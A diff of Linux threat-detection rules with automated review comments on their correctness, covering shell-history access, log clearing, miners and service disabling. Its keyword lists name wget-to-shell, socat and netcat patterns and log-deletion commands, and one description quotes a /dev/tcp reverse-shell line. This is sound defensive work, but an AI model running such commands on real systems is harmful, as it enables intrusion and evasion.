diff --git a/rules/linux/auditd/lnx_auditd_susp_histfile_operations.yml b/rules/linux/auditd/lnx_auditd_susp_histfile_operations.yml index 2515f99b4..7e50f7619 100644 --- a/rules/linux/auditd/lnx_auditd_susp_histfile_operations.yml +++ b/rules/linux/auditd/lnx_auditd_susp_histfile_operations.yml @@ -4,33 +4,33 @@ status: test description: 'Detects commandline operations on shell history files' author: 'Mikhail Larin, oscd.community' references: - - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md date: 2020/10/17 modified: 2021/11/27 logsource: - product: linux - service: auditd + product: linux + service: auditd detection: - execve: - type: EXECVE - history: - - '.bash_history' - - '.zsh_history' - - '.zhistory' - - '.history' - - '.sh_history' - - 'fish_history' - condition: execve and history + execve: + type: EXECVE + history: + - '.bash_history' + - '.zsh_history' + - '.zhistory' + - '.history' + - '.sh_history' + - 'fish_history' + condition: execve and history fields: - - a0 - - a1 - - a2 - - a3 - - key + - a0 + - a1 + - a2 + - a3 + - key falsepositives: - - Legitimate administrative activity - - Legitimate software, cleaning hist file + - Legitimate administrative activity + - Legitimate software, cleaning hist file level: medium tags: - - attack.credential_access - - attack.t1552.003 + - attack.credential_access + - attack.t1552.003 diff --git a/rules/linux/builtin/lnx_shell_susp_commands.yml b/rules/linux/builtin/lnx_shell_susp_commands.yml index 44a5331c4..e31d748e5 100644 --- a/rules/linux/builtin/lnx_shell_susp_commands.yml +++ b/rules/linux/builtin/lnx_shell_susp_commands.yml 
@@ -4,56 +4,56 @@ status: test description: Detects suspicious shell commands used in various exploit codes (see references) author: Florian Roth references: - - http://www.threatgeek.com/2017/03/widespread-exploitation-attempts-using-cve-2017-5638.html - - https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb - - http://pastebin.com/FtygZ1cg - - https://artkond.com/2017/03/23/pivoting-guide/ + - http://www.threatgeek.com/2017/03/widespread-exploitation-attempts-using-cve-2017-5638.html + - https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb + - http://pastebin.com/FtygZ1cg + - https://artkond.com/2017/03/23/pivoting-guide/ date: 2017/08/21 modified: 2021/11/27 logsource: - product: linux + product: linux detection: - keywords: + keywords: # Generic suspicious commands - - 'wget * - http* | perl' - - 'wget * - http* | sh' - - 'wget * - http* | bash' - - 'python -m SimpleHTTPServer' - - '-m http.server' # Python 3 - - 'import pty; pty.spawn*' - - 'socat exec:*' - - 'socat -O /tmp/*' - - 'socat tcp-connect*' - - '*echo binary >>*' + - 'wget * - http* | perl' + - 'wget * - http* | sh' + - 'wget * - http* | bash' + - 'python -m SimpleHTTPServer' + - '-m http.server' # Python 3 + - 'import pty; pty.spawn*' + - 'socat exec:*' + - 'socat -O /tmp/*' + - 'socat tcp-connect*' + - '*echo binary >>*' # Malware - - '*wget *; chmod +x*' - - '*wget *; chmod 777 *' - - '*cd /tmp || cd /var/run || cd /mnt*' + - '*wget *; chmod +x*' + - '*wget *; chmod 777 *' + - '*cd /tmp || cd /var/run || cd /mnt*' # Apache Struts in-the-wild exploit codes - - '*stop;service iptables stop;*' - - '*stop;SuSEfirewall2 stop;*' - - 'chmod 777 2020*' - - '*>>/etc/rc.local' + - '*stop;service iptables stop;*' + - '*stop;SuSEfirewall2 stop;*' + - 'chmod 777 2020*' + - '*>>/etc/rc.local' # 
Metasploit framework exploit codes - - '*base64 -d /tmp/*' - - '* | base64 -d *' - - '*/chmod u+s *' - - '*chmod +s /tmp/*' - - '*chmod u+s /tmp/*' - - '* /tmp/haxhax*' - - '* /tmp/ns_sploit*' - - 'nc -l -p *' - - 'cp /bin/ksh *' - - 'cp /bin/sh *' - - '* /tmp/*.b64 *' - - '*/tmp/ysocereal.jar*' - - '*/tmp/x *' - - '*; chmod +x /tmp/*' - - '*;chmod +x /tmp/*' - condition: keywords + - '*base64 -d /tmp/*' + - '* | base64 -d *' + - '*/chmod u+s *' + - '*chmod +s /tmp/*' + - '*chmod u+s /tmp/*' + - '* /tmp/haxhax*' + - '* /tmp/ns_sploit*' + - 'nc -l -p *' + - 'cp /bin/ksh *' + - 'cp /bin/sh *' + - '* /tmp/*.b64 *' + - '*/tmp/ysocereal.jar*' + - '*/tmp/x *' + - '*; chmod +x /tmp/*' + - '*;chmod +x /tmp/*' + condition: keywords falsepositives: - - Unknown + - Unknown level: high tags: - - attack.execution - - attack.t1059.004 + - attack.execution + - attack.t1059.004 diff --git a/rules/linux/network_connection/net_connection_lnx_back_connect_shell_dev.yml b/rules/linux/network_connection/net_connection_lnx_back_connect_shell_dev.yml index 611227011..6b542f330 100644 --- a/rules/linux/network_connection/net_connection_lnx_back_connect_shell_dev.yml +++ b/rules/linux/network_connection/net_connection_lnx_back_connect_shell_dev.yml 
@@ -3,21 +3,20 @@ id: 83dcd9f6-9ca8-4af7-a16e-a1c7a6b51871 status: experimental description: Detects a bash contecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1') references: - - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/d9921e370b7c668ee8cc42d09b1932c1b98fa9dc/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md + - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/d9921e370b7c668ee8cc42d09b1932c1b98fa9dc/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md date: 2021/10/16 author: Florian Roth logsource: - product: linux - category: network_connection + product: linux + category: network_connection detection: - selection: - Image|endswith: '/bin/bash' - filter: - DestinationIp: - - '127.0.0.1' - - '0.0.0.0' - condition: selection and not filter + selection: + Image|endswith: '/bin/bash' + filter: + DestinationIp: + - '127.0.0.1' + - '0.0.0.0' + condition: selection and not filter falsepositives: - - Unknown + - Unknown level: critical - diff --git a/rules/linux/process_creation/proc_creation_lnx_at_command.yml b/rules/linux/process_creation/proc_creation_lnx_at_command.yml index 18c74f982..f3fd95576 100644 --- a/rules/linux/process_creation/proc_creation_lnx_at_command.yml +++ b/rules/linux/process_creation/proc_creation_lnx_at_command.yml @@ -13,8 +13,8 @@ logsource: detection: selection: Image|endswith: - - '/at' - - '/atd' + - '/at' + - '/atd' condition: selection falsepositives: - Legitimate administration activities diff --git a/rules/linux/process_creation/proc_creation_lnx_base64_decode.yml b/rules/linux/process_creation/proc_creation_lnx_base64_decode.yml index acbfecabe..21ed3909f 100644 --- a/rules/linux/process_creation/proc_creation_lnx_base64_decode.yml +++ b/rules/linux/process_creation/proc_creation_lnx_base64_decode.yml 
@@ -4,20 +4,20 @@ status: test description: Detects usage of base64 utility to decode arbitrary base64-encoded text author: Daniil Yugoslavskiy, oscd.community references: - - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md date: 2020/10/19 modified: 2021/11/27 logsource: - category: process_creation - product: linux + category: process_creation + product: linux detection: - selection: - Image|endswith: '/base64' - CommandLine|contains: '-d' - condition: selection + selection: + Image|endswith: '/base64' + CommandLine|contains: '-d' + condition: selection falsepositives: - - Legitimate activities + - Legitimate activities level: low tags: - - attack.defense_evasion - - attack.t1027 + - attack.defense_evasion + - attack.t1027 diff --git a/rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml b/rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml new file mode 100644 index 000000000..73ac17665 --- /dev/null +++ b/rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml 
@@ -0,0 +1,27 @@ +title: Linux Base64 Encoded Shebang In CLI +id: fe2f9663-41cb-47e2-b954-8a228f3b9dff +status: experimental +description: Detects the presence of a base64 version of the shebang in the commandline, which could indicate a malicious payload about to be decoded +author: Nasreddine Bencherchali +date: 2022/09/15 +references: + - https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html + - https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS +logsource: + product: linux + category: process_creation +detection: + selection: + - CommandLine|contains: + - "IyEvYmluL2Jhc2" #!/bin/bash" + - "IyEvYmluL2Rhc2" #!/bin/dash" + - "IyEvYmluL3pza" #!/bin/zsh" + - "IyEvYmluL2Zpc2" #!/bin/fish + - "IyEvYmluL3No" # !/bin/sh" + condition: selection +falsepositives: + - Legitimate administration activities +level: medium +tags: + - attack.defense_evasion + - attack.t1140 diff --git a/rules/linux/process_creation/proc_creation_lnx_bpftrace_unsafe_option_usage.yml b/rules/linux/process_creation/proc_creation_lnx_bpftrace_unsafe_option_usage.yml index a0c4b717f..42cdad2b6 100644 --- a/rules/linux/process_creation/proc_creation_lnx_bpftrace_unsafe_option_usage.yml +++ b/rules/linux/process_creation/proc_creation_lnx_bpftrace_unsafe_option_usage.yml 
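Review bot: The inline comments on the encoded strings are inconsistent — `#!/bin/bash"`, `#!/bin/fish` (no closing quote) and `# !/bin/sh"` (stray space) — and the `#!` can be misread as part of the value; write them uniformly as the decoded text in quotes, e.g. `- 'IyEvYmluL2Jhc2'  # "#!/bin/bash"`. The description should also state the coverage boundary: each string is the base64 form of the shebang when it begins at a 3-byte boundary of the encoded input, so the other two alignments are not matched — appending `Only the zero-offset base64 alignment is covered.` keeps coverage from being overestimated. `selection:` is written as a one-element list (`- CommandLine|contains:`), which is needless here; a plain mapping matches the other rules in this commit. Separately, this same commit creates `rules/linux/process_creation/prox_creation_lnx_chattr_immutable_removal.yml`, whose `prox_` prefix looks like a typo of `proc_`.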
@@ -4,20 +4,20 @@ status: experimental description: Detects the usage of the unsafe bpftrace option author: Andreas Hunkeler (@Karneades) tags: - - attack.execution - - attack.t1059.004 + - attack.execution + - attack.t1059.004 references: - - https://embracethered.com/blog/posts/2021/offensive-bpf-bpftrace/ - - https://bpftrace.org/ + - https://embracethered.com/blog/posts/2021/offensive-bpf-bpftrace/ + - https://bpftrace.org/ date: 2022/02/11 logsource: - category: process_creation - product: linux + category: process_creation + product: linux detection: - selection1: - Image|endswith: 'bpftrace' - CommandLine|contains: '--unsafe' - condition: selection1 + selection: + Image|endswith: 'bpftrace' + CommandLine|contains: '--unsafe' + condition: selection falsepositives: - - Legitimate usage of the unsafe option + - Legitimate usage of the unsafe option level: medium diff --git a/rules/linux/process_creation/proc_creation_lnx_cat_sudoers.yml b/rules/linux/process_creation/proc_creation_lnx_cat_sudoers.yml index e9c822de9..5f7b9d5e7 100644 --- a/rules/linux/process_creation/proc_creation_lnx_cat_sudoers.yml +++ b/rules/linux/process_creation/proc_creation_lnx_cat_sudoers.yml 
@@ -4,21 +4,24 @@ status: test description: Detects the execution of a cat /etc/sudoers to list all users that have sudo rights author: Florian Roth references: - - https://github.com/sleventyeleven/linuxprivchecker/ + - https://github.com/sleventyeleven/linuxprivchecker/ date: 2022/06/20 +modified: 2022/09/15 logsource: - category: process_creation - product: linux + category: process_creation + product: linux detection: - selection: - Image|endswith: - - '/cat' - - 'grep' - CommandLine|contains: ' /etc/sudoers' - condition: selection + selection: + Image|endswith: + - '/cat' + - 'grep' + - '/head' + - '/tail' + CommandLine|contains: ' /etc/sudoers' + condition: selection falsepositives: - - Legitimate administration activities + - Legitimate administration activities level: medium tags: - - attack.reconnaissance - - attack.t1592.004 + - attack.reconnaissance + - attack.t1592.004 diff --git a/rules/linux/process_creation/proc_creation_lnx_clear_logs.yml b/rules/linux/process_creation/proc_creation_lnx_clear_logs.yml index a3252ac28..115b209a0 100644 --- a/rules/linux/process_creation/proc_creation_lnx_clear_logs.yml +++ b/rules/linux/process_creation/proc_creation_lnx_clear_logs.yml @@ -4,7 +4,7 @@ status: stable description: Detects attempts to clear logs on the system. Adversaries may clear system logs to hide evidence of an intrusion author: Ömer Günal, oscd.community date: 2020/10/07 -modified: 2022/07/07 +modified: 2022/09/15 references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.002/T1070.002.md logsource: @@ -15,6 +15,7 @@ detection: Image|endswith: - '/rm' # covers /rmdir as well - '/shred' + - '/unlink' CommandLine|contains: - '/var/log' - '/var/spool/mail' diff --git a/rules/linux/process_creation/proc_creation_lnx_clear_syslog.yml b/rules/linux/process_creation/proc_creation_lnx_clear_syslog.yml index 03cace922..42f0e639b 100644 
--- a/rules/linux/process_creation/proc_creation_lnx_clear_syslog.yml +++ b/rules/linux/process_creation/proc_creation_lnx_clear_syslog.yml @@ -3,7 +3,7 @@ id: 3fcc9b35-39e4-44c0-a2ad-9e82b6902b31 status: experimental description: Detects specific commands commonly used to remove or empty the syslog. Which is often used by attacker as a method to hide their tracks date: 2021/10/15 -modified: 2022/07/07 +modified: 2022/09/15 author: Max Altgelt, Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC tags: - attack.defense_evasion @@ -20,6 +20,10 @@ detection: - 'rm -r /var/log/syslog' - 'rm -f /var/log/syslog' - 'rm -rf /var/log/syslog' + - 'unlink /var/log/syslog' + - 'unlink -r /var/log/syslog' + - 'unlink -f /var/log/syslog' + - 'unlink -rf /var/log/syslog' - 'mv /var/log/syslog' - ' >/var/log/syslog' - ' > /var/log/syslog' diff --git a/rules/linux/process_creation/proc_creation_lnx_clipboard_collection.yml b/rules/linux/process_creation/proc_creation_lnx_clipboard_collection.yml index 8295856a4..c9c7a3f80 100644 --- a/rules/linux/process_creation/proc_creation_lnx_clipboard_collection.yml +++ b/rules/linux/process_creation/proc_creation_lnx_clipboard_collection.yml @@ -3,7 +3,7 @@ id: ec127035-a636-4b9a-8555-0efd4e59f316 status: experimental description: Detects attempts to collect data stored in the clipboard from users with the usage of xclip tool. Xclip has to be installed. Highly recommended using rule on servers, due to high usage of clipboard utilities on user workstations. date: 2021/10/15 -modified: 2022/07/07 +modified: 2022/09/15 author: Pawel Mazur, Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC tags: - attack.collection 
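Review bot: Three of the four added strings, `'unlink -r /var/log/syslog'`, `'unlink -f /var/log/syslog'` and `'unlink -rf /var/log/syslog'`, describe invocations that cannot remove the file: GNU coreutils `unlink` takes exactly one file operand and accepts no short options, so these fail with an extra-operand error. Only `'unlink /var/log/syslog'` corresponds to a working command; the other three are dead patterns that add maintenance noise and could be dropped. The `CommandLine|contains` list this hunk extends begins before the hunk, so the selection name is not visible here.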
@@ -14,19 +14,13 @@ logsource: product: linux category: process_creation detection: - selection1: + selection: Image|contains: 'xclip' - selection2: - CommandLine|contains: - - '-selection' + CommandLine|contains|all: - '-sel' - selection3: - CommandLine|contains: - - 'clipboard' - 'clip' - selection4: - CommandLine|contains: '-o' - condition: all of selection* + - '-o' + condition: selection falsepositives: - Legitimate usage of xclip tools. level: low diff --git a/rules/linux/process_creation/proc_creation_lnx_crontab_removal.yml b/rules/linux/process_creation/proc_creation_lnx_crontab_removal.yml new file mode 100644 index 000000000..454af266f --- /dev/null +++ b/rules/linux/process_creation/proc_creation_lnx_crontab_removal.yml @@ -0,0 +1,21 @@ +title: Remove Scheduled Cron Task/Job +id: c2e234de-03a3-41e1-b39a-1e56dc17ba67 +status: experimental +description: Detects usage of the 'crontab' utility to remove the current crontab. This is a common occurrence where cryptocurrency miners compete against each other by removing traces of other miners to hijack the maximum amount of resources possible +author: Nasreddine Bencherchali +references: + - https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html +date: 2022/09/15 +logsource: + category: process_creation + product: linux +detection: + selection: + Image|endswith: 'crontab' + CommandLine|contains: ' -r' + condition: selection +falsepositives: + - Unknown +level: medium +tags: + - attack.defense_evasion diff --git a/rules/linux/process_creation/proc_creation_lnx_crypto_mining.yml b/rules/linux/process_creation/proc_creation_lnx_crypto_mining.yml index cc4e2eb28..4a66f1c96 100644 --- a/rules/linux/process_creation/proc_creation_lnx_crypto_mining.yml +++ b/rules/linux/process_creation/proc_creation_lnx_crypto_mining.yml 
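Review bot: In the new crontab-removal rule, `Image|endswith: 'crontab'` has no leading `/`, unlike the image matches in the other rules this commit adds (`'/curl'`, `'/chattr'`, `'/service'`, `'/systemctl'`); `Image|endswith: '/crontab'` would match the same binary without also matching any image name that merely ends in `crontab`. The file also lacks a `modified`/tag for the technique; the sibling rules carry a sub-technique tag, while this one stops at `attack.defense_evasion`, which is worth a look before it leaves experimental.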
@@ -3,36 +3,36 @@ id: 9069ea3c-b213-4c52-be13-86506a227ab1 status: experimental description: Detects command line parameters or strings often used by crypto miners references: - - https://www.poolwatch.io/coin/monero + - https://www.poolwatch.io/coin/monero date: 2021/10/26 author: Florian Roth logsource: - product: linux - category: process_creation + product: linux + category: process_creation detection: - selection: - CommandLine|contains: - - ' --cpu-priority=' - - '--donate-level=0' - - ' -o pool.' - - ' --nicehash' - - ' --algo=rx/0 ' - - 'stratum+tcp://' - - 'stratum+udp://' - # Sub process started by xmrig - the most popular Monero crypto miner - unknown if this causes any false positives - - 'sh -c /sbin/modprobe msr allow_writes=on' - # base64 encoded: --donate-level= - - 'LS1kb25hdGUtbGV2ZWw9' - - '0tZG9uYXRlLWxldmVsP' - - 'tLWRvbmF0ZS1sZXZlbD' - # base64 encoded: stratum+tcp:// and stratum+udp:// - - 'c3RyYXR1bSt0Y3A6Ly' - - 'N0cmF0dW0rdGNwOi8v' - - 'zdHJhdHVtK3RjcDovL' - - 'c3RyYXR1bSt1ZHA6Ly' - - 'N0cmF0dW0rdWRwOi8v' - - 'zdHJhdHVtK3VkcDovL' - condition: selection + selection: + CommandLine|contains: + - ' --cpu-priority=' + - '--donate-level=0' + - ' -o pool.' + - ' --nicehash' + - ' --algo=rx/0 ' + - 'stratum+tcp://' + - 'stratum+udp://' + # Sub process started by xmrig - the most popular Monero crypto miner - unknown if this causes any false positives + - 'sh -c /sbin/modprobe msr allow_writes=on' + # base64 encoded: --donate-level= + - 'LS1kb25hdGUtbGV2ZWw9' + - '0tZG9uYXRlLWxldmVsP' + - 'tLWRvbmF0ZS1sZXZlbD' + # base64 encoded: stratum+tcp:// and stratum+udp:// + - 'c3RyYXR1bSt0Y3A6Ly' + - 'N0cmF0dW0rdGNwOi8v' + - 'zdHJhdHVtK3RjcDovL' + - 'c3RyYXR1bSt1ZHA6Ly' + - 'N0cmF0dW0rdWRwOi8v' + - 'zdHJhdHVtK3VkcDovL' + condition: selection falsepositives: - - Legitimate use of crypto miners + - Legitimate use of crypto miners level: high 
diff --git a/rules/linux/process_creation/proc_creation_lnx_curl_usage.yml b/rules/linux/process_creation/proc_creation_lnx_curl_usage.yml new file mode 100644 index 000000000..730ba33df --- /dev/null +++ b/rules/linux/process_creation/proc_creation_lnx_curl_usage.yml @@ -0,0 +1,22 @@ +title: Curl Usage on Linux +id: ea34fb97-e2c4-4afb-810f-785e4459b194 +status: experimental +description: Detects a curl process start on linux, which indicates a file download from a remote location or a simple web request to a remote server +author: Nasreddine Bencherchali +references: + - https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html +date: 2022/09/15 +logsource: + category: process_creation + product: linux +detection: + selection: + Image|endswith: '/curl.exe' + condition: selection +falsepositives: + - Scripts created by developers and admins + - Administrative activity +level: low +tags: + - attack.command_and_control + - attack.t1105 diff --git a/rules/linux/process_creation/proc_creation_lnx_doas_execution.yml b/rules/linux/process_creation/proc_creation_lnx_doas_execution.yml index c47444781..564c37a36 100644 --- a/rules/linux/process_creation/proc_creation_lnx_doas_execution.yml +++ b/rules/linux/process_creation/proc_creation_lnx_doas_execution.yml @@ -1,7 +1,7 @@ title: Linux Doas Tool Execution id: 067d8238-7127-451c-a9ec-fa78045b618b status: stable -description: Detects the doas tool execution in linux host platform. +description: Detects the doas tool execution in linux host platform. This utility tool allow standard users to perform tasks as root, the same way sudo does. references: - https://research.splunk.com/endpoint/linux_doas_tool_execution/ - https://www.makeuseof.com/how-to-install-and-use-doas/ diff --git a/rules/linux/process_creation/proc_creation_lnx_file_deletion.yml b/rules/linux/process_creation/proc_creation_lnx_file_deletion.yml index 34ac9dccd..85ee9c4e2 100644 
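Review bot: The new Linux curl rule matches `Image|endswith: '/curl.exe'`, which is the Windows binary name; on Linux the image is `/usr/bin/curl` or similar, so this rule never fires as written. `Image|endswith: '/curl'` is what the user-agent rule added in this same commit uses and is the correct value here. The same `'/curl.exe'` value appears in proc_creation_lnx_susp_curl_fileupload.yml further down in this patch and needs the same fix.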
--- a/rules/linux/process_creation/proc_creation_lnx_file_deletion.yml +++ b/rules/linux/process_creation/proc_creation_lnx_file_deletion.yml @@ -1,9 +1,10 @@ title: File Deletion id: 30aed7b6-d2c1-4eaf-9382-b6bc43e50c57 status: stable -description: Detects file deletion using "rm" or "shred" commands which are used often by adversaries to delete files left behind by the actions of their intrusion activity +description: Detects file deletion using "rm", "shred" or "unlink" commands which are used often by adversaries to delete files left behind by the actions of their intrusion activity author: Ömer Günal, oscd.community date: 2020/10/07 +modified: 2022/09/15 references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md logsource: @@ -14,6 +15,7 @@ detection: Image|endswith: - '/rm' # covers /rmdir as well - '/shred' + - '/unlink' condition: selection falsepositives: - Legitimate administration activities diff --git a/rules/linux/process_creation/proc_creation_lnx_local_account.yml b/rules/linux/process_creation/proc_creation_lnx_local_account.yml index d839d854b..058e10b0e 100644 --- a/rules/linux/process_creation/proc_creation_lnx_local_account.yml +++ b/rules/linux/process_creation/proc_creation_lnx_local_account.yml @@ -6,7 +6,7 @@ author: Alejandro Ortuno, oscd.community references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1087.001/T1087.001.md date: 2020/10/08 -modified: 2022/07/07 +modified: 2022/09/15 logsource: category: process_creation product: linux @@ -16,9 +16,13 @@ detection: selection_2: CommandLine|contains: '''x:0:''' selection_3: - Image|endswith: '/cat' + Image|endswith: + - '/cat' + - '/head' + - '/tail' CommandLine|contains: - '/etc/passwd' + - '/etc/shadow' - '/etc/sudoers' selection_4: Image|endswith: '/id' 
diff --git a/rules/linux/process_creation/proc_creation_lnx_local_groups.yml b/rules/linux/process_creation/proc_creation_lnx_local_groups.yml index aa30ec573..ba0b9cad7 100644 --- a/rules/linux/process_creation/proc_creation_lnx_local_groups.yml +++ b/rules/linux/process_creation/proc_creation_lnx_local_groups.yml @@ -6,7 +6,7 @@ author: Ömer Günal, Alejandro Ortuno, oscd.community references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md date: 2020/10/11 -modified: 2022/07/07 +modified: 2022/09/15 logsource: category: process_creation product: linux @@ -14,7 +14,10 @@ detection: selection_1: Image|endswith: '/groups' selection_2: - Image|endswith: '/cat' + Image|endswith: + - '/cat' + - '/head' + - '/tail' CommandLine|contains: '/etc/group' condition: 1 of selection* falsepositives: diff --git a/rules/linux/process_creation/proc_creation_lnx_nohup.yml b/rules/linux/process_creation/proc_creation_lnx_nohup.yml index 1b8abaea7..1c902a284 100644 --- a/rules/linux/process_creation/proc_creation_lnx_nohup.yml +++ b/rules/linux/process_creation/proc_creation_lnx_nohup.yml 
@@ -4,17 +4,17 @@ status: experimental description: Detects usage of nohup which could be leveraged by an attacker to keep a process running or break out from restricted environments author: 'Christopher Peacock @SecurePeacock, SCYTHE @scythe_io' references: - - https://gtfobins.github.io/gtfobins/nohup/ - - https://en.wikipedia.org/wiki/Nohup - - https://www.computerhope.com/unix/unohup.htm + - https://gtfobins.github.io/gtfobins/nohup/ + - https://en.wikipedia.org/wiki/Nohup + - https://www.computerhope.com/unix/unohup.htm date: 2022/06/06 logsource: - product: linux - category: process_creation + product: linux + category: process_creation detection: - selection: - Image|endswith: '/nohup' - condition: selection + selection: + Image|endswith: '/nohup' + condition: selection falsepositives: - - Administrators or installed processes that leverage nohup + - Administrators or installed processes that leverage nohup level: medium diff --git a/rules/linux/process_creation/proc_creation_lnx_python_pty_spawn.yml b/rules/linux/process_creation/proc_creation_lnx_python_pty_spawn.yml index 7b7fbcd02..b56b56825 100644 --- a/rules/linux/process_creation/proc_creation_lnx_python_pty_spawn.yml +++ b/rules/linux/process_creation/proc_creation_lnx_python_pty_spawn.yml @@ -26,4 +26,4 @@ detection: condition: selection_image and 1 of selection_cli* falsepositives: - Unknown -level: high \ No newline at end of file +level: high diff --git a/rules/linux/process_creation/proc_creation_lnx_security_software_discovery.yml b/rules/linux/process_creation/proc_creation_lnx_security_software_discovery.yml index 76ac81188..1fef2d0a7 100644 --- a/rules/linux/process_creation/proc_creation_lnx_security_software_discovery.yml +++ b/rules/linux/process_creation/proc_creation_lnx_security_software_discovery.yml 
@@ -1,18 +1,21 @@ title: Security Software Discovery id: c9d8b7fd-78e4-44fe-88f6-599135d46d60 status: test -description: Detects usage of system utilities (only grep for now) to discover security software discovery +description: Detects usage of system utilities (only grep and egrep for now) to discover security software discovery author: Daniil Yugoslavskiy, oscd.community references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518.001/T1518.001.md date: 2020/10/19 -modified: 2022/07/11 +modified: 2022/09/15 logsource: category: process_creation product: linux detection: selection: - Image|endswith: '/grep' + Image|endswith: + # You can add more grep variations such as fgrep, rgrep...etc + - '/grep' + - '/egrep' CommandLine|contains: - 'nessusd' # nessus vulnerability scanner - 'td-agent' # fluentd log shipper diff --git a/rules/linux/process_creation/proc_creation_lnx_security_tools_disabling.yml b/rules/linux/process_creation/proc_creation_lnx_security_tools_disabling.yml index b800cd73a..e48f83c9b 100644 --- a/rules/linux/process_creation/proc_creation_lnx_security_tools_disabling.yml +++ b/rules/linux/process_creation/proc_creation_lnx_security_tools_disabling.yml 
@@ -17,66 +17,66 @@ detection: selection_iptables_1: Image|endswith: '/service' CommandLine|contains|all: - - 'iptables' - - 'stop' + - 'iptables' + - 'stop' selection_iptables_2: Image|endswith: '/service' CommandLine|contains|all: - - 'ip6tables' - - 'stop' + - 'ip6tables' + - 'stop' selection_iptables_3: Image|endswith: '/chkconfig' CommandLine|contains|all: - - 'iptables' - - 'stop' + - 'iptables' + - 'stop' selection_iptables_4: Image|endswith: '/chkconfig' CommandLine|contains|all: - - 'ip6tables' - - 'stop' + - 'ip6tables' + - 'stop' selection_firewall_1: Image|endswith: '/systemctl' CommandLine|contains|all: - - 'firewalld' - - 'stop' + - 'firewalld' + - 'stop' selection_firewall_2: Image|endswith: '/systemctl' CommandLine|contains|all: - - 'firewalld' - - 'disable' + - 'firewalld' + - 'disable' selection_carbonblack_1: Image|endswith: '/service' CommandLine|contains|all: - - 'cbdaemon' - - 'stop' + - 'cbdaemon' + - 'stop' selection_carbonblack_2: Image|endswith: '/chkconfig' CommandLine|contains|all: - - 'cbdaemon' - - 'off' + - 'cbdaemon' + - 'off' selection_carbonblack_3: Image|endswith: '/systemctl' CommandLine|contains|all: - - 'cbdaemon' - - 'stop' + - 'cbdaemon' + - 'stop' selection_carbonblack_4: Image|endswith: '/systemctl' CommandLine|contains|all: - - 'cbdaemon' - - 'disable' + - 'cbdaemon' + - 'disable' selection_selinux: Image|endswith: '/setenforce' CommandLine|contains: '0' selection_crowdstrike_1: Image|endswith: '/systemctl' CommandLine|contains|all: - - 'stop' - - 'falcon-sensor' + - 'stop' + - 'falcon-sensor' selection_crowdstrike_2: Image|endswith: '/systemctl' CommandLine|contains|all: - - 'disable' - - 'falcon-sensor' + - 'disable' + - 'falcon-sensor' condition: 1 of selection* falsepositives: - Legitimate administration activities 
diff --git a/rules/linux/process_creation/proc_creation_lnx_services_stop_and_disable.yml b/rules/linux/process_creation/proc_creation_lnx_services_stop_and_disable.yml
new file mode 100644
index 000000000..130d9b5c8
--- /dev/null
+++ b/rules/linux/process_creation/proc_creation_lnx_services_stop_and_disable.yml
@@ -0,0 +1,26 @@
+title: Disable Or Stop Servicess
+id: de25eeb8-3655-4643-ac3a-b662d3f26b6b
+status: experimental
+description: Detects the usage of utilities such as 'systemctl', 'service'...etc to stop or disable tools and services
+author: Nasreddine Bencherchali
+date: 2022/09/15
+references:
+ - https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html
+tags:
+ - attack.defense_evasion
+logsource:
+ category: process_creation
+ product: linux
+detection:
+ selection:
+ Image|endswith:
+ - '/service'
+ - '/systemctl'
+ - '/chkconfig'
+ CommandLine|contains:
+ - 'stop'
+ - 'disable'
+ condition: selection
+falsepositives:
+ - Legitimate administration activities
+level: medium
diff --git a/rules/linux/process_creation/proc_creation_lnx_susp_curl_fileupload.yml b/rules/linux/process_creation/proc_creation_lnx_susp_curl_fileupload.yml
new file mode 100644
index 000000000..a38c1ef16
--- /dev/null
+++ b/rules/linux/process_creation/proc_creation_lnx_susp_curl_fileupload.yml
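Review bot: The title has a typo, `title: Disable Or Stop Servicess` should be `title: Disable Or Stop Services`. The match itself is very broad: `CommandLine|contains: 'stop'`/`'disable'` against `/service`, `/systemctl` and `/chkconfig` fires on every routine service restart and on any unit name containing those substrings, which the `falsepositives` entry already concedes. Either rate it `level: low` like the curl-usage rule in this commit, or anchor the subcommand (`' stop '`, `' disable '`) and pair it with specific daemon names the way the existing security_tools_disabling rule does.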
@@ -0,0 +1,38 @@
+title: Suspicious Curl File Upload - Linux
